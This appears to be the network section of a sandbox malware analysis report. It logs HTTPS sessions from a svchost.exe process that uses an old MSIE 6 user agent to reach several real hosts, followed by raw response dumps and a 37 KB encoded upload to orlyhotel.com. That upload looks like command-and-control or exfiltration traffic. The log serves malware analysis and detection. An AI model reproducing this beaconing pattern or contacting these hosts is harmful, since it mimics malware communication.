                                                                                                                                                                                                                                                        2023-10-09 13:50:55 UTC9INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        30192.168.2.362809172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4834OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: orlyhotel.com


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        31192.168.2.36260991.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4834OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7551INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:18 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7552INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8220INData Raw: 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 0d 0a 32 30 30 30 0d 0a 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c 6e 6f 73 63 69 20 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 61 67 6c 6f 77 65 6b 31 22 3e 3c 68 32 3e 41 6b 74 75 61 6c 6e 6f c5 9b 63 69 3c 2f 68 32 3e 0d 0a 20 20 3c 21 2d 2d 20 6f 70 63 6a 65
                                                                                                                                                                                                                                                        Data Ascii: </section></div>... topnews. -->... content --><div id="content"> ... content-left --> <article id="w2000txt" class="mainLeft"> ... aktualnosci --><div class="naglowek1"><h2>Aktualnoci</h2> ... opcje
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8236INData Raw: 64 6f 70 61 6c 61 63 7a 65 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 64 6f 70 61 6c 61 63 7a 65 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 33 39 36 31 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 64 6f 70 61 6c 61 63 7a 65 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 2f 3e 3c 2f 61 3e 0d 0a 31 30 30 30 0d 0a 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 68 65 69 67 68 74 3a 31 32 37 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77
                                                                                                                                                                                                                                                        Data Ascii: dopalacze.html" target="_blank" aria-label="dopalacze"><img src="/dokumenty/batony/3961.jpg?v=1657112618" alt="dopalacze" aria-hidden="true" /></a>1000</div><div class="item" style="width:300px; height:127px;margin-bottom:10px"><a href="/w
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8252INData Raw: 75 20 4b 50 50 20 50 6c 65 73 7a 65 77 2e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 34 36 36 31 36 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 5a 61 70 6f 7a 6e 61 6a 20 73 69 c4 99 20 7a 20 7a 61 73 61 64 61 6d 69 3c 2f 61 3e 3c 62 72 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 6c 69 63 6a 61 2e 70 6c 2f 70 6f 6c 2f 77 6f 6c 6e 79 74 65 6b 73 74 2f 35 39 34 38 35 2c 64 6f 6b 2e 68 74 6d 6c 22 3e 50 6f 6c 69 74 79 6b 61 20 70 72 79 77 61 74 6e 6f c5 9b 63 69 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20
                                                                                                                                                                                                                                                        Data Ascii: u KPP Pleszew.<br/> <a href="https://policja.pl/pol/wolnytekst/46616,dok.html">Zapoznaj si z zasadami</a><br/> <a href="https://policja.pl/pol/wolnytekst/59485,dok.html">Polityka prywatnoci</a> </li>


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        32192.168.2.36273775.2.95.235443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC4834OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: ldh.la.gov
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5251INHTTP/1.1 406 Not Acceptable
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:11 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 1346
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5251INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 36 20 2d 20 43 6c 69
                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>406 - Cli


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        33192.168.2.36277894.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5171OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7567INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:11 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7568INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        34192.168.2.362797185.237.66.112443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC5524OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: techtrans.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7824INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:11 GMT
                                                                                                                                                                                                                                                        Server: Apache
                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                                                                                                                                        Expires: 0
                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                        Content-Security-Policy: report-uri https://techtrans.de
                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(), autoplay=(), camera=(), fullscreen=*, geolocation=(self), gyroscope=(), microphone=(), payment=*
                                                                                                                                                                                                                                                        Upgrade: h2,h2c
                                                                                                                                                                                                                                                        Connection: Upgrade, close
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET,PUT,POST,DELETE
                                                                                                                                                                                                                                                        Access-Control-Allow-Headers: Content-Type, Authorization
                                                                                                                                                                                                                                                        X-Content-Security-Policy: img-src *; media-src * data:;
                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC7825INData Raw: 32 63 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 27 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 3c 2f 68 65 61 64 3e 3c 62
                                                                                                                                                                                                                                                        Data Ascii: 2c6<!DOCTYPE HTML PUBLIC '-//IETF//DTD HTML 2.0//EN'><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv='Content-Type' content='text/html; charset=utf-8'></head><b


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        35192.168.2.36322294.130.146.206443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:11 UTC7551OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: www.diamir.de
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8380INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:12 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Content-Length: 548
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        2023-10-09 13:52:12 UTC8380INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                        36192.168.2.354735172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                        2023-10-09 13:52:17 UTC8445OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                        Content-Length: 37524
                                                                                                                                                                                                                                                        2023-10-09 13:52:17 UTC8445OUTData Raw: 4c 30 70 78 49 2b 34 4d 46 52 34 6e 4d 44 70 44 54 6c 6c 69 61 33 52 39 68 6f 38 65 4b 43 6d 54 48 4a 65 44 37 61 65 2b 31 7a 49 62 79 65 63 66 38 51 70 5a 4c 52 59 41 75 77 2b 6c 6c 4d 57 51 32 67 33 55 53 36 2b 6a 30 32 37 4a 46 72 6d 46 52 4a 7a 30 6a 55 35 4b 6e 2f 70 4f 68 30 38 77 4e 46 5a 62 53 63 58 6e 6d 2b 69 54 4b 71 2f 43 34 6d 56 50 31 2b 39 50 37 4b 31 52 48 6b 72 69 42 57 73 30 52 35 44 77 48 44 67 47 56 4b 63 47 33 51 63 4d 6b 51 31 62 49 70 6e 53 42 52 66 6d 52 4d 30 34 49 67 44 4c 67 52 4f 4e 38 56 51 4c 63 39 41 55 69 6b 42 5a 73 71 69 4e 74 65 42 68 35 51 4e 64 76 4a 39 6e 41 4e 78 4c 2f 30 67 58 50 76 36 63 76 41 4b 6f 2b 6f 4d 4e 6a 46 35 51 77 6d 79 34 36 37 33 47 63 34 6a 47 55 77 69 67 63 62 55 6c 57 34 64 62 50 46 64 6f 4d 5a 6f
                                                                                                                                                                                                                                                        Data Ascii: L0pxI+4MFR4nMDpDTllia3R9ho8eKCmTHJeD7ae+1zIbyecf8QpZLRYAuw+llMWQ2g3US6+j027JFrmFRJz0jU5Kn/pOh08wNFZbScXnm+iTKq/C4mVP1+9P7K1RHkriBWs0R5DwHDgGVKcG3QcMkQ1bIpnSBRfmRM04IgDLgRON8VQLc9AUikBZsqiNteBh5QNdvJ9nANxL/0gXPv6cvAKo+oMNjF5Qwmy4673Gc4jGUwigcbUlW4dbPFdoMZo
                                                                                                                                                                                                                                                        2023-10-09 13:52:17 UTC8461OUTData Raw: 45 78 55 47 61 4d 61 2f 52 41 4f 4f 35 71 42 6b 71 47 50 65 7a 70 6e 71 4f 76 56 69 31 2f 74 69 2b 75 61 76 62 52 74 2b 74 33 69 63 68 43 34 6d 6f 58 38 42 55 67 54 6b 53 67 47 44 74 4e 69 56 43 2b 33 4a 71 55 37 46 72 79 37 32 4f 32 48 62 43 35 43 64 36 38 6d 43 34 64 53 6e 33 6b 62 59 56 2f 2b 72 64 31 5a 79 63 73 53 76 5a 6b 77 6e 68 6e 37 4f 56 50 76 6d 45 38 54 7a 2f 38 64 59 55 34 79 6f 4c 6e 57 4b 70 42 6d 4d 66 66 66 52 44 74 71 67 53 39 46 64 6c 45 46 2f 66 6b 7a 51 53 4b 59 4d 47 77 74 37 63 78 76 45 41 79 39 4f 75 70 47 7a 35 44 6a 31 32 43 4a 49 68 48 69 61 36 78 6e 4c 7a 57 2f 4c 4c 45 72 66 59 7a 33 2b 6f 6d 67 31 2f 63 55 36 49 38 36 65 72 6f 6f 65 55 53 4b 74 32 31 61 63 67 2f 4c 63 61 32 39 6b 31 54 79 69 31 6d 39 39 43 76 32 76 76 7a 2b
                                                                                                                                                                                                                                                        Data Ascii: ExUGaMa/RAOO5qBkqGPezpnqOvVi1/ti+uavbRt+t3ichC4moX8BUgTkSgGDtNiVC+3JqU7Fry72O2HbC5Cd68mC4dSn3kbYV/+rd1ZycsSvZkwnhn7OVPvmE8Tz/8dYU4yoLnWKpBmMfffRDtqgS9FdlEF/fkzQSKYMGwt7cxvEAy9OupGz5Dj12CJIhHia6xnLzW/LLErfYz3+omg1/cU6I86erooeUSKt21acg/Lca29k1Tyi1m99Cv2vvz+
                                                                                                                                                                                                                                                        2023-10-09 13:52:17 UTC8477OUTData Raw: 5a 48 39 6f 52 6a 39 42 33 31 43 79 47 72 73 56 70 31 39 70 48 34 7a 6a 58 46 52 33 5a 43 35 61 6b 56 74 58 63 35 6d 75 56 72 6e 69 64 75 57 30 61 47 39 32 2b 64 68 66 5a 47 69 6c 66 41 79 6b 37 41 6c 78 69 63 33 4c 74 36 38 41 66 4a 4e 49 36 46 57 4e 4f 2b 48 77 69 62 56 35 66 6c 6a 48 2f 55 71 6c 48 4f 37 65 62 4c 36 78 63 6f 6b 53 45 78 64 6d 65 30 6e 5a 73 34 53 32 65 6a 2b 61 45 46 42 56 53 54 70 76 4f 50 44 2f 47 41 67 73 65 6f 7a 43 6c 61 52 50 43 2f 43 64 4a 63 58 6a 73 6c 48 4c 61 43 42 4e 51 31 4e 57 51 7a 63 63 73 65 37 48 55 50 61 42 33 7a 42 59 6d 73 67 66 33 79 5a 71 64 44 38 68 52 31 35 67 4f 4d 47 42 39 78 49 51 36 72 79 68 7a 75 43 74 41 32 6c 55 38 61 64 33 75 2b 77 6e 4d 2b 6d 6b 7a 77 4c 6f 58 47 30 6d 4b 45 65 42 4c 63 62 69 50 37 2b
                                                                                                                                                                                                                                                        Data Ascii: ZH9oRj9B31CyGrsVp19pH4zjXFR3ZC5akVtXc5muVrniduW0aG92+dhfZGilfAyk7Alxic3Lt68AfJNI6FWNO+HwibV5fljH/UqlHO7ebL6xcokSExdme0nZs4S2ej+aEFBVSTpvOPD/GAgseozClaRPC/CdJcXjslHLaCBNQ1NWQzccse7HUPaB3zBYmsgf3yZqdD8hR15gOMGB9xIQ6ryhzuCtA2lU8ad3u+wnM+mkzwLoXG0mKEeBLcbiP7+
                                                                                                                                                                                                                                                        2023-10-09 13:52:18 UTC8482INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                        Date: Mon, 09 Oct 2023 13:52:17 GMT
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1utoYQp9YEU5vuOztQxITdXBD%2Fgi4snjtORj%2Bj66G1ulSpDqh9B3pYqhi%2BnSB6cWyfOniQ5hZO8NXsBBJuIIQ%2FfqAWb4%2F%2B4Cqcpt1e1MBW4FZ3cbn6YLOn7Yul4l%2F3%2Bf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                        CF-RAY: 81371a6d5c7c103d-LAX
                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
